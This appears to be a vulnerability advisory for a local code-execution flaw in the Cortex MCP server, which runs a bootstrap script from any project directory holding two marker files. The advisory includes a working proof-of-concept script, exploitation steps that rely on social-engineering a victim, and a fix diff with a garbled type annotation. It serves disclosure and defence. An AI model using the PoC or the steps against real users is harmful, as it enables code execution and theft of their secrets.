Listen to this Post
How the Mentioned CVE Works
The vulnerability exists in how the Cortex MCP server (neuro-cortex-memory) handles the `CLAUDE_PROJECT_DIR` environment variable. This variable is automatically set by Claude Code to the directory the user currently has open. When a user invokes the `open_visualization` tool, the function `_find_dev_source()` builds a list of candidate directories by iterating over `CORTEX_DEV_ROOT` and CLAUDE_PROJECT_DIR. It then treats the user’s active project directory as a trusted Cortex source root.
The only validation performed by `_is_cortex_root()` is checking for the presence of an `mcp_server/` subdirectory and a `ui/unified-viz.html` file. These are trivial markers that an attacker can easily replicate in a malicious repository. There is no git remote identity check, cryptographic signature verification, release path allowlist, or explicit developer opt-in requirement.
Once a directory passes this weak validation, the handler constructs a bootstrap path and executes it unconditionally via subprocess.run([sys.executable, str(bootstrap_path)]). A secondary code-execution path exists in http_launcher.py, where the same CLAUDE_PROJECT_DIR-derived dev source is used to `rsync` attacker-controlled files into the Cortex plugin cache directory.
The entry point is the MCP tool open_visualization, registered with no authentication required at the tool layer. The tool is reachable through the standard stdio MCP transport. An attacker who places the two marker files in a malicious repository can cause Cortex to execute an arbitrary `visualize_bootstrap.py` from that directory, achieving code execution with the privileges of the victim’s local user process. CVSS v3.1 Base Score: 7.8 (High).
DailyCVE Form
Platform: Cortex MCP server
Version: ≥ 3.17.0
Vulnerability: Local Code Execution
Severity: High (7.8 CVSS)
date: 2026-07-01
Prediction: 2026-07-15
What Undercode Say
The vulnerability stems from trusting an environment variable that is automatically set by Claude Code without any verification of the source directory’s authenticity. The weak validation (only checking for two marker files) makes it trivial for attackers to craft malicious repositories. This is a classic case of insufficient validation of user-controlled input leading to arbitrary code execution.
Analytics Commands:
Check if Cortex MCP server is installed and its version pip show neuro-cortex-memory Check for the presence of the vulnerable files in a project ls -la mcp_server/server/visualize_bootstrap.py ls -la ui/unified-viz.html Monitor for suspicious subprocess execution ps aux | grep -E "python.visualize_bootstrap" Check environment variables echo $CLAUDE_PROJECT_DIR
PoC Code Snippet:
import asyncio, os, tempfile
from pathlib import Path
from mcp_server.handlers import open_visualization as ov
base = Path(tempfile.mkdtemp(prefix="cortex-malicious-project-"))
(base / "mcp_server" / "server").mkdir(parents=True)
(base / "ui").mkdir()
(base / "ui" / "unified-viz.html").write_text("<html>attacker</html>", encoding="utf-8")
sentinel = Path("/tmp/cortex-open-visualization-poc-owned")
if sentinel.exists():
sentinel.unlink()
(base / "mcp_server" / "server" / "visualize_bootstrap.py").write_text(
"from pathlib import Path\n"
"Path('/tmp/cortex-open-visualization-poc-owned').write_text('executed', encoding='utf-8')\n"
"print('bootstrap-ran')\n",
encoding="utf-8",
)
os.environ["CLAUDE_PROJECT_DIR"] = str(base)
ov.launch_server = lambda _typ: "http://127.0.0.1:3458"
ov.open_in_browser = lambda _url: None
result = asyncio.run(ov.handler({}))
print(result.get("bootstrap"))
print(sentinel.read_text())
Expected output: bootstrap-ran / executed
Exploit
The attack requires the victim to have the Cortex MCP plugin installed and to open an attacker-crafted project directory in Claude Code. When the victim invokes the `open_visualization` tool (e.g., via the `/cortex-visualize` slash command), attacker-controlled Python code runs immediately with the full privileges of the victim’s local user account.
Exploitation Steps:
- Create a malicious repository with the following structure:
malicious-project/ ├── mcp_server/ │ └── server/ │ └── visualize_bootstrap.py Attacker-controlled code └── ui/ └── unified-viz.html Dummy marker file
- Social-engineer the victim into opening this repository in Claude Code (this automatically sets `CLAUDE_PROJECT_DIR` to the repository path).
- Wait for the victim to invoke the `/cortex-visualize` command or trigger the `open_visualization` MCP tool.
- The attacker’s code executes with the victim’s local user privileges.
Secondary Exploitation Path:
The `http_launcher.py` path allows the attacker to overwrite files in the Cortex plugin cache directory via rsync, potentially establishing persistence that survives after the malicious project is closed.
Protection
Immediate Remediation:
Remove `CLAUDE_PROJECT_DIR` from the dev-source candidate list. Gate executable dev-source resolution behind an explicit opt-in flag so that only a developer who deliberately sets both `CORTEX_DEV_SOURCE_SYNC=1` and `CORTEX_DEV_ROOT` can trigger the bootstrap path:
a/mcp_server/handlers/open_visualization.py
+++ b/mcp_server/handlers/open_visualization.py
- candidates: list[bash] = []
- for env in ("CORTEX_DEV_ROOT", "CLAUDE_PROJECT_DIR"):
- v = os.environ.get(env)
- if v:
- candidates.append(Path(v))
+ candidates: list[bash] = []
+ if os.environ.get("CORTEX_DEV_SOURCE_SYNC") == "1":
+ v = os.environ.get("CORTEX_DEV_ROOT")
+ if v:
+ candidates.append(Path(v))
candidates.append(Path.home() / "Documents" / "Developments" / "Cortex")
Apply the same change to `mcp_server/server/http_launcher.py:80-83` to eliminate the secondary `rsync` execution path.
Additional Protections:
- Implement cryptographic signature verification for dev-source directories.
- Add a git remote identity check to ensure the source is from a trusted repository.
- Require explicit user opt-in before executing any code from a project directory.
- Run MCP servers with restricted privileges or in a sandboxed environment.
- Regularly update the Cortex MCP server to the latest version.
Impact
This is a local arbitrary code execution vulnerability. Any user who has the Cortex MCP plugin installed and opens (or is social-engineered into opening) an attacker-crafted project directory in Claude Code is at risk. When the victim invokes the `open_visualization` tool, attacker-controlled Python code runs immediately with the full privileges of the victim’s local user account.
Consequences include:
- Confidentiality: Exfiltration of files, secrets, environment variables, and SSH/GPG keys accessible to the local user.
- Integrity: Modification or deletion of local files, source code, credentials, and plugin caches.
- Availability: Termination of local processes or destruction of user data.
The secondary path through `http_launcher.py` additionally allows the attacker to overwrite files in the Cortex plugin cache directory, potentially establishing persistence that survives after the malicious project is closed.
The attack requires the victim to invoke the visualization tool (UI:R), which is reflected in the CVSS score. No elevated privileges or prior authentication to any network service are required.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

